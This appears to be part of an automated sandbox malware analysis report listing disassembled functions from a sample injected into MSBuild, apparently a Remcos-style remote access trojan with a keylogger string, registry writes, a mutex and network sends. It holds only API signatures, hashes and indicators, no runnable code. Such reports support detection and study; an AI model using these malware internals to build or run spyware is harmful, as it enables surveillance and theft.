                                                                                                                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                            Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                            • String ID: `AG
                                                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                                                            • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                            • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                            Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                            • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                            • String ID: HgF$pth_unenc
                                                                                                                                            • API String ID: 1818849710-3662775637
                                                                                                                                            • Opcode ID: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                            • Opcode Fuzzy Hash: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                            Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                              • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2099061454-0
                                                                                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                            Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2152742572-0
                                                                                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                            Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                            • SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EventObjectSingleWaitsend
                                                                                                                                            • String ID: LAL
                                                                                                                                            • API String ID: 3963590051-3302426157
                                                                                                                                            • Opcode ID: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                                                                            • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                            • Opcode Fuzzy Hash: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                                                                            • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                            Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                            • String ID: Offline Keylogger Started
                                                                                                                                            • API String ID: 465354869-4114347211
                                                                                                                                            • Opcode ID: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                            • Opcode Fuzzy Hash: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                            Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                            • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                            • String ID: TUF
                                                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                            Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3360349984-0
                                                                                                                                            • Opcode ID: 153faa50691565e1b7e0162d62e0adc95336b7a2c72cd5f78c30f469eea54d1a
                                                                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                            • Opcode Fuzzy Hash: 153faa50691565e1b7e0162d62e0adc95336b7a2c72cd5f78c30f469eea54d1a
                                                                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                            Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                            Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3919263394-0
                                                                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                            Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountEventTick
                                                                                                                                            • String ID: >G
                                                                                                                                            • API String ID: 180926312-1296849874
                                                                                                                                            • Opcode ID: 094a325683d6b30a43efbfda0b7386eed36104a737248fa31382aa0198ea447e
                                                                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                            • Opcode Fuzzy Hash: 094a325683d6b30a43efbfda0b7386eed36104a737248fa31382aa0198ea447e
                                                                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                            Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                            • String ID: Rmc-QM0FWK
                                                                                                                                            • API String ID: 1925916568-4096834054
                                                                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                            Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                            • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                            Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                            • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                            • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                            • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                            Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                            Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
